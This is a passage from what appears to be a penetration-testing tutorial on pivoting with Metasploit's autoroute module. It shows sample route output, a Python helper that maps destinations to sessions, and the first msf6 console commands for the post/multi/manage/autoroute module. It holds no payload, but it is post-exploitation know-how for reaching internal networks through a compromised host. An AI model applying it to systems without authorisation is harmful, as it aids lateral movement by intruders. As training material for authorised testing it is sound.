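[+] Route added to subnet 10.10.168.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
"""

if __name__ == "__main__":
    routes = prune_attacker_subnet(parse_autoroute_output(SAMPLE_AUTOROUTE, 1), "192.168.0.111")
    for dst in ("10.10.168.2", "192.168.0.105", "8.8.8.8"):
        via = route_for(dst, routes)
        print(f"{dst:15} -> {'session ' + str(via) if via else 'local stack'}")
```

The 169.254.0.0/16 route is noise from the host's link-local configuration and can be removed the same way; it is harmless but makes `route print` harder to read.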
post/multi/manage/autoroute can also be used as a regular module from the msf prompt:

msf6 > use post/multi/manage/autoroute 
msf6 post(multi/manage/autoroute) > show options

Module options (post/multi/manage/autoroute):